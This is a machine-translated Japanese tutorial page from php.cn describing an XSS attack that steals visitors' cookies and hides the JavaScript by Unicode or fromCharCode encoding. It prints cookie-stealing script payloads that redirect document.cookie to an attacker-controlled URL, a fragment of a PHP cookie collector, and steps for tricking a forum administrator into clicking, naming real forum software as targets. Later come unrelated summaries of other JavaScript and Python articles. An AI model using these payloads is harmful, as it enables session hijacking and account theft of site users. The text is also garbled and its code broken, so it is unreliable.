Cookie スプーフィングで JavaScript の実行を隠蔽する XSS 攻撃-jsチュートリアル-php.cn

ホームページ

ウェブフロントエンド

jsチュートリアル

Cookie スプーフィングで JavaScript の実行を隠蔽する XSS 攻撃

高洛峰

Nov 25, 2016 am 09:45 AM

javascript

たとえば、XSS が可能な場所を見つけた場合:
<script>アラート (何があってもポップアップする)</script>

Cookie を盗むファイルを自分で入手します。

その目的は、私たちが設計したトラップを他の視聴者が閲覧できるようにすることです
<script>document.location=http://URL.com/cookie.php?cookie='+escape(document.cookie) &lt ; /script> 実際、その方法についてはこれ以上説明する必要はありません。。 ここでは主に JavaScript の実行を非表示にする方法について説明します。 XSS 脆弱性の EXP がリリースされるたび、またはそれを悪用するたびに、毎日 milw0rm.com にアクセスして EXP を確認することに慣れているかもしれません。 でも、情報を Cookie に保存できないのはなぜですか? 。 Magic や PHPBB などの大規模なフォーラムにはすべて XSS 脆弱性があります。 これを与えました <script>document.location=http://URL.com/cookie.php?cookie='+escape(document.cookie) </script>

Javascriptが表示されます間違い。

外部の機密情報を Unicode でエンコードできます。

URL を指定します: http://www.mikezilla.com/exp0012.html

これがエンコード方法です:
<script>eval( location.href="http://www.php1.cn/"> 上記が機能しない場合は、2 番目の方法を使用してください JavaScript の eval 関数 fromCharCode 上記のように、一部の Web サイトは次の方法でエンコードできますunicode たとえば、エンコードされた 104、116、116、112 は HTTP フォーラムが PHPWind で使用される WYSIWYG エディタなどの他のエディタを使用している場合 http://url を直接入力すると確実に公開されます.com 次に、エディタの形式に合わせてURLを変更します 例えば、COOKIEを盗むサイトは http://www.URL.com とします http:// www.url.com もちろん、表示されている部分が表示されます運営やクリックを騙す魅力的な情報に置き換えることもできます ちょっとしたソーシャルエンジニアリングを使うだけです 最初のアイデアが完成したので、実装してみましょう ステップ 1: 管理者は私たちの構造を見て、彼をクリックしました ステップ 2: Javascript が正常に実行されました ステップ 3: Cookie を盗むために盗まれた COOKIE ファイルを作成しました ステップ 4: 私たちは十分に愚かではありません。 URL に接続します。これはプレーンテキストであり、URL は Unicode でエンコードされています (ここでは暗号化されていると言うのが通例です) http://www.mikezilla.com/exp0012.html ステップ 5: インターセプトされた Cookie情報はもちろん平文ではありません。FireFox Cookie Edit を使用するだけで済みます。COOKIE を に置き換えるか、CookieEditor などの他のツールを使用しても問題ありません。個人的な提案: Cookie を盗むには、必ずしもを使用する必要はありません。たとえば、@hotmail.com","cookie Monster",$_REQUEST[cookie]); ?> <html> <script> document.location=http://www.URL.com/&#39 ;</script>

声明

この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。

JavaScriptフレームワークのパワーは、開発を簡素化し、ユーザーエクスペリエンスとアプリケーションのパフォーマンスを向上させることにあります。フレームワークを選択するときは、次のことを検討してください。1。プロジェクトのサイズと複雑さ、2。チームエクスペリエンス、3。エコシステムとコミュニティサポート。

JavaScript、C、およびブラウザの関係May 01, 2025 am 12:06 AM

はじめに私はあなたがそれを奇妙に思うかもしれないことを知っています、JavaScript、C、およびブラウザは正確に何をしなければなりませんか？彼らは無関係であるように見えますが、実際、彼らは現代のウェブ開発において非常に重要な役割を果たしています。今日は、これら3つの間の密接なつながりについて説明します。この記事を通して、JavaScriptがブラウザでどのように実行されるか、ブラウザエンジンでのCの役割、およびそれらが協力してWebページのレンダリングと相互作用を駆動する方法を学びます。私たちは皆、JavaScriptとブラウザの関係を知っています。 JavaScriptは、フロントエンド開発のコア言語です。ブラウザで直接実行され、Webページが鮮明で興味深いものになります。なぜJavascrを疑問に思ったことがありますか

node.jsは、型を使用してストリーミングしますApr 30, 2025 am 08:22 AM

node.jsは、主にストリームのおかげで、効率的なI/Oで優れています。ストリームはデータを段階的に処理し、メモリの過負荷を回避します。大きなファイル、ネットワークタスク、リアルタイムアプリケーションの場合。ストリームとTypeScriptのタイプの安全性を組み合わせることで、パワーが作成されます

Python vs. JavaScript：パフォーマンスと効率の考慮事項Apr 30, 2025 am 12:08 AM

PythonとJavaScriptのパフォーマンスと効率の違いは、主に以下に反映されています。1）解釈された言語として、Pythonはゆっくりと実行されますが、開発効率が高く、迅速なプロトタイプ開発に適しています。 2）JavaScriptはブラウザ内の単一のスレッドに限定されていますが、マルチスレッドおよび非同期I/Oを使用してnode.jsのパフォーマンスを改善でき、両方とも実際のプロジェクトで利点があります。

JavaScriptの起源：その実装言語の調査Apr 29, 2025 am 12:51 AM

JavaScriptは1995年に発信され、Brandon Ikeによって作成され、言語をCに実現しました。 2。JavaScriptのメモリ管理とパフォーマンスの最適化は、C言語に依存しています。 3. C言語のクロスプラットフォーム機能は、さまざまなオペレーティングシステムでJavaScriptを効率的に実行するのに役立ちます。

舞台裏：JavaScriptをパワーする言語は何ですか？Apr 28, 2025 am 12:01 AM

JavaScriptはブラウザとnode.js環境で実行され、JavaScriptエンジンに依存してコードを解析および実行します。 1）解析段階で抽象的構文ツリー（AST）を生成します。 2）ASTをコンパイル段階のバイトコードまたはマシンコードに変換します。 3）実行段階でコンパイルされたコードを実行します。

PythonとJavaScriptの未来：傾向と予測Apr 27, 2025 am 12:21 AM

PythonとJavaScriptの将来の傾向には、1。Pythonが科学コンピューティングの分野での位置を統合し、AI、2。JavaScriptはWebテクノロジーの開発を促進します。どちらもそれぞれのフィールドでアプリケーションシナリオを拡大し続け、パフォーマンスをより多くのブレークスルーを行います。

Python vs. JavaScript：開発環境とツールApr 26, 2025 am 12:09 AM

開発環境におけるPythonとJavaScriptの両方の選択が重要です。 1）Pythonの開発環境には、Pycharm、Jupyternotebook、Anacondaが含まれます。これらは、データサイエンスと迅速なプロトタイピングに適しています。 2）JavaScriptの開発環境には、フロントエンドおよびバックエンド開発に適したnode.js、vscode、およびwebpackが含まれます。プロジェクトのニーズに応じて適切なツールを選択すると、開発効率とプロジェクトの成功率が向上する可能性があります。

See all articles